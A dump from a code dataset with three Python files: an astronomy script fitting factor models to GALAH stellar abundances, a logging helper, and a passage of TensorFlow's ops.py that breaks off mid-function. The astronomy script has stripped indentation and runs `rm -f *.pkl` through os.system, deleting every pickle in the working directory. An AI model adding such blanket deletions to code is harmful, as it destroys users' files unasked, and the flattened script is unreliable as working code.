] | 2 | 2018-08-23T06:54:17.000Z | 2021-03-05T14:38:41.000Z | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
] | null | null | null | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
] | null | null | null |
"""
Experiment using all GALAH data.
"""
from __future__ import division # Just in case. Use Python 3.
import os
import sys
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import yaml
from matplotlib.ticker import MaxNLocator
from collections import Counter
from scipy import linalg
from hashlib import md5
sys.path.insert(0, "../../")
from mcfa import (mcfa, grid_search, mpl_utils, utils)
import galah_dr2 as galah
matplotlib.style.use(mpl_utils.mpl_style)
here = os.path.dirname(os.path.realpath(__file__))
with open("config.yml") as fp:
config = yaml.load(fp)
print(f"Config: {config}")
np.random.seed(config["random_seed"])
prefix = os.path.basename(__file__)[:-3]
unique_hash = md5((f"{config}").encode("utf-8")).hexdigest()[:5]
unique_config_path = f"{unique_hash}.yml"
if os.path.exists(unique_config_path):
print(f"Warning: this configuration already exists: {unique_config_path}")
with open(unique_config_path, "w") as fp:
yaml.dump(config, fp)
with open(__file__, "r") as fp:
code = fp.read()
with open(f"{unique_hash}-{__file__}", "w") as fp:
fp.write(code)
def savefig(fig, suffix):
    """Save `fig` as both PNG (150 dpi) and PDF (300 dpi) next to this script.

    File names follow "<script>-<config hash>-<suffix>.{png,pdf}".
    """
    here = os.path.dirname(os.path.realpath(__file__))
    filename = os.path.join(here, f"{prefix}-{unique_hash}-{suffix}")
    # Bug fix: `filename` was computed but unused, and the figures were written
    # to a literal "(unknown).png"/"(unknown).pdf" in the working directory.
    fig.savefig(f"{filename}.png", dpi=150)
    fig.savefig(f"{filename}.pdf", dpi=300)
import os
# Remove stale cached results from previous runs in this directory.
# NOTE(review): this deletes *every* .pkl in the CWD, including the grid-search
# cache written below, so the cached-results branch never triggers on a fresh run.
os.system("rm -f *.pkl")
N_elements = 20  # NOTE(review): appears unused below -- candidate for removal.
use_galah_flags = config["use_galah_flags"]
mcfa_kwds = dict()
mcfa_kwds.update(config["mcfa_kwds"])
# Element list for this experiment, optionally filtered by an ignore list.
elements = config[prefix]["elements"]
if config[prefix]["ignore_elements"] is not None:
    elements = [el for el in elements if el not in config[prefix]["ignore_elements"]]
print(elements)
# Boolean mask selecting stars with measurements for all requested elements.
mask = galah.get_abundance_mask(elements, use_galah_flags=use_galah_flags)
galah_cuts = config["exp3"]["galah_cuts"]
if galah_cuts is not None:
    print(f"Applying cuts: {galah_cuts}")
    for k, (lower, upper) in galah_cuts.items():
        # Keep stars with lower <= data[k] <= upper (element-wise AND via *).
        mask *= (upper >= galah.data[k]) * (galah.data[k] >= lower)
print(f"Number of stars: {sum(mask)}")
X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
print(f"Data shape: {X_H.shape}")
def convert_xh_to_xy(X_H, label_names, y_label):
    """Re-express [X/H] abundances relative to `y_label` (e.g. to get [X/Fe]).

    Every column except the `y_label` column has that column's values
    subtracted from it; the `y_label` column itself is returned unchanged.
    """
    y_index = label_names.index(y_label)
    y_h = X_H[:, y_index]
    converted = X_H - y_h[:, np.newaxis]
    # Restore the reference column (it should not be differenced with itself).
    converted[:, y_index] = X_H[:, y_index]
    return converted
if config["wrt_x_fe"]:
X = convert_xh_to_xy(X_H, label_names, "fe_h")
else:
X = X_H
if not config["log_abundance"]:
X = 10**X
if config["subtract_mean"]:
X = X - np.mean(X, axis=0)
N, D = X.shape
# Do a gridsearch.
gs_options = config["exp3"]["gridsearch"]
max_n_latent_factors = gs_options["max_n_latent_factors"]
max_n_components = gs_options["max_n_components"]
Js = 1 + np.arange(max_n_latent_factors)
Ks = 1 + np.arange(max_n_components)
N_inits = gs_options["n_inits"]
results_path = f"{prefix}-gridsearch-results.pkl"
if os.path.exists(results_path):
with open(results_path, "rb") as fp:
Jg, Kg, converged, meta, X, mcfa_kwds = pickle.load(fp)
else:
Jg, Kg, converged, meta = grid_search.grid_search(Js, Ks, X,
N_inits=N_inits, mcfa_kwds=mcfa_kwds)
with open(results_path, "wb") as fp:
pickle.dump((Jg, Kg, converged, meta, X, mcfa_kwds), fp)
ll = meta["ll"]
bic = meta["bic"]
mml = meta["message_length"]
J_best_ll, K_best_ll = grid_search.best(Js, Ks, -ll)
J_best_bic, K_best_bic = grid_search.best(Js, Ks, bic)
J_best_mml, K_best_mml = grid_search.best(Js, Ks, mml)
print(f"Best log likelihood at J = {J_best_ll} and K = {K_best_ll}")
print(f"Best BIC value found at J = {J_best_bic} and K = {K_best_bic}")
print(f"Best MML value found at J = {J_best_mml} and K = {K_best_mml}")
# Plot some contours.
plot_filled_contours_kwds = dict(converged=converged,
marker_function=np.nanargmin, N=100,
cmap="Spectral_r")
fig_ll = mpl_utils.plot_filled_contours(Jg, Kg, -ll,
colorbar_label=r"$-\log\mathcal{L}$",
**plot_filled_contours_kwds)
savefig(fig_ll, "gridsearch-ll")
fig_bic = mpl_utils.plot_filled_contours(Jg, Kg, bic,
colorbar_label=r"$\textrm{BIC}$",
**plot_filled_contours_kwds)
savefig(fig_bic, "gridsearch-bic")
fig_mml = mpl_utils.plot_filled_contours(Jg, Kg, mml,
colorbar_label=r"$\textrm{MML}$",
**plot_filled_contours_kwds)
savefig(fig_mml, "gridsearch-mml")
model = meta["best_models"][config["adopted_metric"]]
latex_label_names = [r"$\textrm{{{0}}}$".format(ea.split("_")[0].title()) for ea in label_names]
# Draw unrotated.
J_max = config["max_n_latent_factors_for_colormap"]
J_max = 12
cmap = mpl_utils.discrete_cmap(J_max, base_cmap="Spectral")
colors = [cmap(j) for j in range(J_max)]#[::-1]
A_est = model.theta_[model.parameter_names.index("A")]
A_astrophysical = np.zeros_like(A_est)#np.random.normal(0, 0.1, size=A_est.shape)
for i, tes in enumerate(config["grouped_elements"][:model.n_latent_factors]):
for j, te in enumerate(tes):
try:
idx = label_names.index("{0}_h".format(te.lower()))
except ValueError:
print(f"Skipping {te}")
else:
count = sum([(te in foo) for foo in config["grouped_elements"][:model.n_latent_factors]])
A_astrophysical[idx, i] = 1.0/count
A_astrophysical /= np.clip(np.sqrt(np.sum(A_astrophysical, axis=0)), 1, np.inf)
# Un-assigned columns
for column_index in np.where(np.all(A_astrophysical == 0, axis=0))[0]:
print(f"Warning: unassigned column index: {column_index}")
A_astrophysical[:, column_index] = np.random.normal(0, 1e-2, size=D)
if config["correct_A_astrophysical"]:
AL = linalg.cholesky(A_astrophysical.T @ A_astrophysical)
A_astrophysical = A_astrophysical @ linalg.solve(AL, np.eye(model.n_latent_factors))
max_n_rotations = 3
for each in range(max_n_rotations):
A_est = model.theta_[model.parameter_names.index("A")]
R, p_opt, cov, *_ = utils.find_rotation_matrix(A_astrophysical, A_est,
full_output=True)
R_opt = utils.exact_rotation_matrix(A_astrophysical, A_est,
p0=np.random.uniform(-np.pi, np.pi, model.n_latent_factors**2))
# WTF check R_opt.
AL = linalg.cholesky(R_opt.T @ R_opt)
R_opt2 = R_opt @ linalg.solve(AL, np.eye(model.n_latent_factors))
chi1 = np.sum(np.abs(A_est @ R - A_astrophysical))
chi2 = np.sum(np.abs(A_est @ R_opt2 - A_astrophysical))
R = R_opt2 if chi2 < chi1 else R
# Now make it a valid rotation matrix.
model.rotate(R, X=X, ensure_valid_rotation=True)
import pickle
with open(f"{unique_hash}-exp3-model.pkl", "wb") as fp:
pickle.dump(model, fp)
"""
J = model.n_latent_factors
L = model.theta_[model.parameter_names.index("A")]
elements = [ea.split("_")[0].title() for ea in label_names]
A_est = model.theta_[model.parameter_names.index("A")]
A_astrophysical = np.zeros_like(A_est)#np.random.normal(0, 0.1, size=A_est.shape)
for i, tes in enumerate(config["grouped_elements"][:model.n_latent_factors]):
for j, te in enumerate(tes):
try:
idx = label_names.index("{0}_h".format(te.lower()))
except ValueError:
print(f"Skipping {te}")
else:
count = sum([(te in foo) for foo in config["grouped_elements"][:model.n_latent_factors]])
A_astrophysical[idx, i] = 1.0/count
A_astrophysical /= np.clip(np.sqrt(np.sum(A_astrophysical, axis=0)), 1, np.inf)
# Un-assigned columns
for column_index in np.where(np.all(A_astrophysical == 0, axis=0))[0]:
print(f"Warning: unassigned column index: {column_index}")
A_astrophysical[:, column_index] = np.random.normal(0, 1e-2, size=D)
AL = linalg.cholesky(A_astrophysical.T @ A_astrophysical)
A_astrophysical = A_astrophysical @ linalg.solve(AL, np.eye(model.n_latent_factors))
R, p_opt, cov, *_ = utils.find_rotation_matrix(A_astrophysical, A_est,
full_output=True)
R_opt = utils.exact_rotation_matrix(A_astrophysical, A_est,
p0=np.random.uniform(-np.pi, np.pi, model.n_latent_factors**2))
# WTF check R_opt.
AL = linalg.cholesky(R_opt.T @ R_opt)
R_opt2 = R_opt @ linalg.solve(AL, np.eye(model.n_latent_factors))
chi1 = np.sum(np.abs(A_est @ R - A_astrophysical))
chi2 = np.sum(np.abs(A_est @ R_opt2 - A_astrophysical))
R = R_opt2 if chi2 < chi1 else R
# Now make it a valid rotation matrix.
model.rotate(R, X=X, ensure_valid_rotation=True)
"""
fig_fac = mpl_utils.plot_factor_loads_and_contributions(model, X,
label_names=latex_label_names, colors=colors,
target_loads=A_astrophysical)
savefig(fig_fac, "latent-factors-and-contributions-with-targets")
fig_fac = mpl_utils.plot_factor_loads_and_contributions(model, X,
label_names=latex_label_names, colors=colors)
savefig(fig_fac, "latent-factors-and-contributions")
raise a
# Plot clustering in data space and latent space.
# For the latent space we will just use a corner plot.
component_cmap = mpl_utils.discrete_cmap(7, base_cmap="Spectral_r")
fig = mpl_utils.plot_latent_space(model, X, ellipse_kwds=dict(alpha=0), s=10, edgecolor="none", alpha=1, c=[component_cmap(_) for _ in np.argmax(model.tau_, axis=1)], show_ticks=True,
label_names=[r"$\mathbf{{S}}_{{{0}}}$".format(i + 1) for i in range(model.n_latent_factors)])
for ax in fig.axes:
if ax.is_last_row():
ax.set_ylim(-1, 1)
ax.set_yticks([-1, 0, 1])
fig.tight_layout()
savefig(fig, "latent-space")
# For the data space we will use N x 2 panels of [X/Fe] vs [Fe/H], coloured by their responsibility.
#X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
fig, axes = plt.subplots(5, 3, figsize=(7.1, 9.0))
axes = np.atleast_1d(axes).flatten()
x = X_H.T[label_names.index("fe_h")]
c = np.argmax(model.tau_, axis=1)
K = model.n_components
y_idx = 0
for i, ax in enumerate(axes):
if label_names[i] == "fe_h":
y_idx += 1
y = X_H.T[y_idx] - x
ax.scatter(x, y, c=[component_cmap(_) for _ in c], s=10, edgecolor="none", rasterized=True)
element = label_names[y_idx].split("_")[0].title()
ax.set_ylabel(r"$[\textrm{{{0}/Fe}}]$".format(element))
y_idx += 1
x_lims = (-1.5, 0.5)
y_lims = (-0.5, 1.0)
for ax in axes:
ax.set_xlim(x_lims)
ax.set_ylim(y_lims)
ax.set_xticks([-1.5, -0.5, 0.5])
#ax.set_yticks([-0.5, 0.25, 1.0, 1.75])
ax.set_yticks([-0.5, 0, 0.5, 1.0])
if ax.is_last_row():
ax.set_xlabel(r"$[\textrm{Fe/H}]$")
else:
ax.set_xticklabels([])
ax.plot(x_lims, [0, 0], ":", c="#666666", lw=0.5, zorder=-1)
ax.plot([0, 0], y_lims, ":", c="#666666", lw=0.5, zorder=-1)
fig.tight_layout()
savefig(fig, "data-space")
latex_elements = [r"$\textrm{{{0}}}$".format(le.split("_")[0].title()) for le in label_names]
fig_scatter = mpl_utils.plot_specific_scatter(model,
steps=True,
xlabel="",
xticklabels=latex_elements,
ylabel=r"$\textrm{specific scatter / dex}$",
ticker_pad=20)
fig_scatter.axes[0].set_yticks(np.arange(0, 0.20, 0.05))
savefig(fig_scatter, "specific-scatter")
here = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(here, f"{prefix}-{unique_hash}-data.fits")
subset = galah.data[mask]
subset["association"] = np.argmax(model.tau_, axis=1)
subset.write(filename, overwrite=True)
| 29.149644 | 183 | 0.641705 |
41082b631863e667da63c3e0b99d92600e6d8ee7 | 615 | py | Python | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | 2 | 2022-01-14T08:00:34.000Z | 2022-01-17T12:42:44.000Z | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | null | null | null | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | 1 | 2022-01-31T21:25:21.000Z | 2022-01-31T21:25:21.000Z | import sys
from logging import INFO, FileHandler, Formatter, StreamHandler
def set_logger(logger):
    """Attach an INFO-level stdout handler to `logger` and set its level to INFO."""
    stream_handler = StreamHandler(sys.stdout)
    stream_handler.setFormatter(Formatter("%(asctime)s %(levelname)s %(message)s"))
    stream_handler.setLevel(INFO)
    logger.setLevel(INFO)
    logger.addHandler(stream_handler)
def add_log_filehandler(logger, conf_name: str, logfile_path: str):
    """Additionally write `logger` output to `logfile_path` at INFO level.

    `conf_name` is accepted for interface compatibility but is not used here.
    """
    file_handler = FileHandler(logfile_path)
    file_handler.setFormatter(Formatter("%(asctime)s %(levelname)s %(message)s"))
    file_handler.setLevel(INFO)
    logger.addHandler(file_handler)
| 30.75 | 67 | 0.744715 |
83a973dd65aa3363e9d8ad4c07b99900e2dd9857 | 242,711 | py | Python | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
] | 1 | 2020-08-07T22:18:01.000Z | 2020-08-07T22:18:01.000Z | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions used to construct graphs."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import re
import sys
import threading
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import monitoring
from tensorflow.python.eager import tape
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import registry
from tensorflow.python.framework import tensor_conversion_registry
from tensorflow.python.framework import tensor_like
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import traceable_stack
from tensorflow.python.framework import versions
from tensorflow.python.ops import control_flow_util
from tensorflow.python.platform import app
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import decorator_utils
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import lock_util
from tensorflow.python.util import memory
from tensorflow.python.util import object_identity
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_stack
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.lazy_loader import LazyLoader
from tensorflow.python.util.tf_export import tf_export
# Lazily import autograph's context module to avoid importing it at load time.
ag_ctx = LazyLoader(
    "ag_ctx", globals(),
    "tensorflow.python.autograph.core.ag_ctx")

# Temporary global switches determining if we should enable the work-in-progress
# calls to the C API. These will be removed once all functionality is supported.
_USE_C_API = True
_USE_C_SHAPES = True

# Gauge recording whether eager execution was explicitly enabled via the v1 API.
_api_usage_gauge = monitoring.BoolGauge(
    "/tensorflow/api/ops_eager_execution",
    "Whether ops.enable_eager_execution() is called.")

# Module-local aliases for private names used throughout this file.
# pylint: disable=protected-access
_TensorLike = tensor_like._TensorLike
_DTYPES_INTERN_TABLE = dtypes._INTERN_TABLE
# pylint: enable=protected-access
def tensor_id(tensor):
  """Returns a unique identifier for this Tensor.

  The id is assigned via `uid()` when the tensor is constructed and is unique
  within this program execution, so it is usable as a dict/set key.
  """
  return tensor._id  # pylint: disable=protected-access
class _UserDeviceSpec(object):
  """Store user-specified device and provide computation of merged device."""

  def __init__(self, device_name_or_function):
    """Wraps what the user supplied to a device scope.

    Args:
      device_name_or_function: one of a `pydev.MergeDevice`, a callable
        mapping a NodeDef to a device string, a plain device-spec string,
        or None (which marks a break in the device stack).
    """
    self._device_name_or_function = device_name_or_function
    self.display_name = str(self._device_name_or_function)
    self.function = device_name_or_function
    self.raw_string = None

    if isinstance(device_name_or_function, pydev.MergeDevice):
      self.is_null_merge = device_name_or_function.is_null_merge

    elif callable(device_name_or_function):
      self.is_null_merge = False
      # Build a readable display name from the function's definition site,
      # e.g. "my_device_fn<file.py, 42>".
      dev_func = self._device_name_or_function
      func_name = function_utils.get_func_name(dev_func)
      func_code = function_utils.get_func_code(dev_func)
      if func_code:
        fname = func_code.co_filename
        lineno = func_code.co_firstlineno
      else:
        fname = "unknown"
        lineno = -1
      self.display_name = "%s<%s, %d>" % (func_name, fname, lineno)

    elif device_name_or_function is None:
      # NOTE(taylorrobie): This MUST be False. None signals a break in the
      # device stack, so `is_null_merge` must be False for such a case to
      # allow callers to safely skip over null merges without missing a None.
      self.is_null_merge = False

    else:
      # Plain device-spec string: convert to a MergeDevice once, up front.
      self.raw_string = device_name_or_function
      self.function = pydev.merge_device(device_name_or_function)
      self.is_null_merge = self.function.is_null_merge

    # We perform this check in __init__ because it is of non-trivial cost,
    # and self.string_merge is typically called many times.
    self.fast_string_merge = isinstance(self.function, pydev.MergeDevice)

  def string_merge(self, node_def):
    """Returns the device string for `node_def` merged with this spec."""
    if self.fast_string_merge:
      return self.function.shortcut_string_merge(node_def)

    return compat.as_str(_device_string(self.function(node_def)))
class NullContextmanager(object):
  """A context manager that does nothing on entry or exit.

  Accepts (and ignores) arbitrary constructor arguments so it can stand in
  for a real context manager.
  """

  def __init__(self, *args, **kwargs):
    del args, kwargs  # Unused; accepted for interface compatibility.

  def __enter__(self):
    return None

  def __exit__(self, type_arg, value_arg, traceback_arg):
    # Returning a falsy value re-raises any exception from the with-block.
    return False
def _override_helper(clazz_object, operator, func):
"""Overrides (string) operator on Tensors to call func.
Args:
clazz_object: the class to override for; either Tensor or SparseTensor.
operator: the string name of the operator to override.
func: the function that replaces the overridden operator.
Raises:
ValueError: If operator has already been overwritten,
or if operator is not allowed to be overwritten.
"""
existing = getattr(clazz_object, operator, None)
if existing is not None:
# Check to see if this is a default method-wrapper or slot wrapper which
# will be true for the comparison operators.
if not isinstance(existing, type(object.__lt__)):
raise ValueError("operator %s cannot be overwritten again on class %s." %
(operator, clazz_object))
if operator not in Tensor.OVERLOADABLE_OPERATORS:
raise ValueError("Overriding %s is disallowed" % operator)
setattr(clazz_object, operator, func)
def _as_graph_element(obj):
"""Convert `obj` to a graph element if possible, otherwise return `None`.
Args:
obj: Object to convert.
Returns:
The result of `obj._as_graph_element()` if that method is available;
otherwise `None`.
"""
conv_fn = getattr(obj, "_as_graph_element", None)
if conv_fn and callable(conv_fn):
return conv_fn()
return None
_TENSOR_LIKE_TYPES = tuple()


def is_dense_tensor_like(t):
  """EXPERIMENTAL: Returns true if `t` implements the tensor interface.

  See `register_dense_tensor_like_type()` for the current definition of a
  "tensor-like type".

  Args:
    t: An object.

  Returns:
    True iff `t` is an instance of one of the registered "tensor-like" types.
  """
  return isinstance(t, _TENSOR_LIKE_TYPES)


def register_dense_tensor_like_type(tensor_type):
  """EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface.

  A "tensor-like type" can represent a single dense tensor, and implements
  the `name` and `dtype` properties.

  Args:
    tensor_type: A type implementing the tensor interface.

  Raises:
    TypeError: If `tensor_type` does not implement the tensor interface.
  """
  for attr in ("name", "dtype"):
    # A missing attribute and a non-property attribute are both rejected.
    try:
      defines_property = isinstance(getattr(tensor_type, attr), property)
    except AttributeError:
      defines_property = False
    if not defines_property:
      raise TypeError("Type %s does not define a `%s` property" %
                      (tensor_type.__name__, attr))
  # We expect this list to be small, so choose quadratic complexity
  # for registration, so that we have a tuple that can be used for
  # more efficient `isinstance` checks later.
  global _TENSOR_LIKE_TYPES
  _TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type])
def uid():
  """A unique (within this program execution) integer."""
  # Delegates to the C extension; used e.g. to assign Tensor._id at creation.
  return c_api.TFE_Py_UID()
def numpy_text(tensor, is_repr=False):
  """Human readable representation of a tensor's numpy value.

  Args:
    tensor: an object exposing `dtype` and a `_numpy()` method.
    is_repr: if True, format the numpy value with `repr` instead of `str`.

  Returns:
    The formatted value, or "<unprintable>" for dtypes with no numpy
    equivalent. Multi-line renderings are prefixed with a newline so they
    start on a fresh line when embedded in a larger message.
  """
  if not tensor.dtype.is_numpy_compatible:
    text = "<unprintable>"
  else:
    formatter = repr if is_repr else str
    text = formatter(tensor._numpy())  # pylint: disable=protected-access
  if "\n" in text:
    text = "\n" + text
  return text
@tf_export(v1=["enable_tensor_equality"])
def enable_tensor_equality():
"""Compare Tensors with element-wise comparison and thus be unhashable.
Comparing tensors with element-wise allows comparisons such as
tf.Variable(1.0) == 1.0. Element-wise equality implies that tensors are
unhashable. Thus tensors can no longer be directly used in sets or as a key in
a dictionary.
"""
Tensor._USE_EQUALITY = True # pylint: disable=protected-access
@tf_export(v1=["disable_tensor_equality"])
def disable_tensor_equality():
"""Compare Tensors by their id and be hashable.
This is a legacy behaviour of TensorFlow and is highly discouraged.
"""
Tensor._USE_EQUALITY = False # pylint: disable=protected-access
@tf_export("Tensor")
class Tensor(_TensorLike):
"""Represents one of the outputs of an `Operation`.
A `Tensor` is a symbolic handle to one of the outputs of an
`Operation`. It does not hold the values of that operation's output,
but instead provides a means of computing those values in a
TensorFlow `tf.compat.v1.Session`.
This class has two primary purposes:
1. A `Tensor` can be passed as an input to another `Operation`.
This builds a dataflow connection between operations, which
enables TensorFlow to execute an entire `Graph` that represents a
large, multi-step computation.
2. After the graph has been launched in a session, the value of the
`Tensor` can be computed by passing it to
`tf.Session.run`.
`t.eval()` is a shortcut for calling
`tf.compat.v1.get_default_session().run(t)`.
In the following example, `c`, `d`, and `e` are symbolic `Tensor`
objects, whereas `result` is a numpy array that stores a concrete
value:
```python
# Build a dataflow graph.
c = tf.constant([[1.0, 2.0], [3.0, 4.0]])
d = tf.constant([[1.0, 1.0], [0.0, 1.0]])
e = tf.matmul(c, d)
# Construct a `Session` to execute the graph.
sess = tf.compat.v1.Session()
# Execute the graph and store the value that `e` represents in `result`.
result = sess.run(e)
```
"""
# List of Python operators that we allow to override.
OVERLOADABLE_OPERATORS = {
# Binary.
"__add__",
"__radd__",
"__sub__",
"__rsub__",
"__mul__",
"__rmul__",
"__div__",
"__rdiv__",
"__truediv__",
"__rtruediv__",
"__floordiv__",
"__rfloordiv__",
"__mod__",
"__rmod__",
"__lt__",
"__le__",
"__gt__",
"__ge__",
"__ne__",
"__eq__",
"__and__",
"__rand__",
"__or__",
"__ror__",
"__xor__",
"__rxor__",
"__getitem__",
"__pow__",
"__rpow__",
# Unary.
"__invert__",
"__neg__",
"__abs__",
"__matmul__",
"__rmatmul__"
}
# Whether to allow hashing or numpy-style equality
_USE_EQUALITY = tf2.enabled()
  def __init__(self, op, value_index, dtype):
    """Creates a new `Tensor`.

    Args:
      op: An `Operation`. `Operation` that computes this tensor.
      value_index: An `int`. Index of the operation's endpoint that produces
        this tensor.
      dtype: A `DType`. Type of elements stored in this tensor.

    Raises:
      TypeError: If the op is not an `Operation`.
    """
    if not isinstance(op, Operation):
      raise TypeError("op needs to be an Operation: %s" % op)
    self._op = op
    self._value_index = value_index
    self._dtype = dtypes.as_dtype(dtype)
    # This will be set by self._as_tf_output().
    self._tf_output = None
    # This will be set by self.shape().
    self._shape_val = None
    # List of operations that use this Tensor as input. We maintain this list
    # to easily navigate a computation graph.
    self._consumers = []
    # Process-unique id; also used lazily to build self._name below.
    self._id = uid()
    self._name = None

  @staticmethod
  def _create_with_tf_output(op, value_index, dtype, tf_output):
    """Constructor variant that pre-populates the cached TF_Output handle."""
    ret = Tensor(op, value_index, dtype)
    ret._tf_output = tf_output
    return ret

  @property
  def op(self):
    """The `Operation` that produces this tensor as an output."""
    return self._op

  @property
  def dtype(self):
    """The `DType` of elements in this tensor."""
    return self._dtype

  @property
  def graph(self):
    """The `Graph` that contains this tensor."""
    return self._op.graph

  @property
  def name(self):
    """The string name of this tensor, "<op name>:<output index>" (cached)."""
    if self._name is None:
      if not self._op.name:
        raise ValueError("Operation was not named: %s" % self._op)
      self._name = "%s:%d" % (self._op.name, self._value_index)
    return self._name

  @property
  def device(self):
    """The name of the device on which this tensor will be produced, or None."""
    return self._op.device

  @property
  def shape(self):
    """Returns the `TensorShape` that represents the shape of this tensor.

    The shape is computed using shape inference functions that are
    registered in the Op for each `Operation`. See
    `tf.TensorShape`
    for more details of what a shape represents.

    The inferred shape of a tensor is used to provide shape
    information without having to launch the graph in a session. This
    can be used for debugging, and providing early error messages. For
    example:

    ```python
    c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])

    print(c.shape)
    ==> TensorShape([Dimension(2), Dimension(3)])

    d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]])

    print(d.shape)
    ==> TensorShape([Dimension(4), Dimension(2)])

    # Raises a ValueError, because `c` and `d` do not have compatible
    # inner dimensions.
    e = tf.matmul(c, d)

    f = tf.matmul(c, d, transpose_a=True, transpose_b=True)

    print(f.shape)
    ==> TensorShape([Dimension(3), Dimension(4)])
    ```

    In some cases, the inferred shape may have unknown dimensions. If
    the caller has additional information about the values of these
    dimensions, `Tensor.set_shape()` can be used to augment the
    inferred shape.

    Returns:
      A `TensorShape` representing the shape of this tensor.
    """
    if self._shape_val is None:
      # Computed once via the C API and then cached on the instance.
      self._shape_val = self._c_api_shape()
    return self._shape_val
  def _get_input_ops_without_shapes(self, target_op):
    """Returns ops needing shape inference to compute target_op's shape."""
    # Iterative depth-first walk from this tensor's producing op, following
    # the inputs of any tensor whose static shape has not been cached yet.
    result = []
    stack = [self._op]
    visited = set()
    while stack:
      op = stack.pop()
      if op in visited:
        continue
      result.append(op)
      stack.extend(t.op for t in op.inputs if t._shape_val is None)
      visited.add(op)
    return result

  def _c_api_shape(self):
    """Returns the TensorShape of this tensor according to the C API."""
    c_graph = self._op._graph._c_graph  # pylint: disable=protected-access
    shape_vector, unknown_shape = c_api.TF_GraphGetTensorShapeHelper(
        c_graph, self._as_tf_output())
    if unknown_shape:
      return tensor_shape.unknown_shape()
    else:
      # The C API encodes unknown dimensions as -1; map them back to None.
      shape_vector = [None if d == -1 else d for d in shape_vector]
      return tensor_shape.TensorShape(shape_vector)

  @property
  def _shape(self):
    # Deprecated private alias of .shape, kept only to warn old callers.
    logging.warning("Tensor._shape is private, use Tensor.shape "
                    "instead. Tensor._shape will eventually be removed.")
    return self.shape

  @_shape.setter
  def _shape(self, value):
    raise ValueError(
        "Tensor._shape cannot be assigned, use Tensor.set_shape instead.")

  def _disallow_when_autograph_disabled(self, task):
    """Raises: `task` failed because AutoGraph is explicitly disabled here."""
    raise errors.OperatorNotAllowedInGraphError(
        "{} is not allowed: AutoGraph is disabled in this function."
        " Try decorating it directly with @tf.function.".format(task))

  def _disallow_when_autograph_enabled(self, task):
    """Raises: `task` failed because AutoGraph did not convert this function."""
    raise errors.OperatorNotAllowedInGraphError(
        "{} is not allowed: AutoGraph did not convert this function. Try"
        " decorating it directly with @tf.function.".format(task))

  def _disallow_in_graph_mode(self, task):
    """Raises: `task` is not allowed under V1-style graph execution."""
    raise errors.OperatorNotAllowedInGraphError(
        "{} is not allowed in Graph execution. Use Eager execution or decorate"
        " this function with @tf.function.".format(task))

  def _disallow_bool_casting(self):
    # Pick the error message that matches the current AutoGraph status.
    if ag_ctx.control_status_ctx().status == ag_ctx.Status.DISABLED:
      self._disallow_when_autograph_disabled(
          "using a `tf.Tensor` as a Python `bool`")
    elif ag_ctx.control_status_ctx().status == ag_ctx.Status.ENABLED:
      self._disallow_when_autograph_enabled(
          "using a `tf.Tensor` as a Python `bool`")
    else:
      # Default: V1-style Graph execution.
      self._disallow_in_graph_mode("using a `tf.Tensor` as a Python `bool`")

  def _disallow_iteration(self):
    # Pick the error message that matches the current AutoGraph status.
    if ag_ctx.control_status_ctx().status == ag_ctx.Status.DISABLED:
      self._disallow_when_autograph_disabled("iterating over `tf.Tensor`")
    elif ag_ctx.control_status_ctx().status == ag_ctx.Status.ENABLED:
      self._disallow_when_autograph_enabled("iterating over `tf.Tensor`")
    else:
      # Default: V1-style Graph execution.
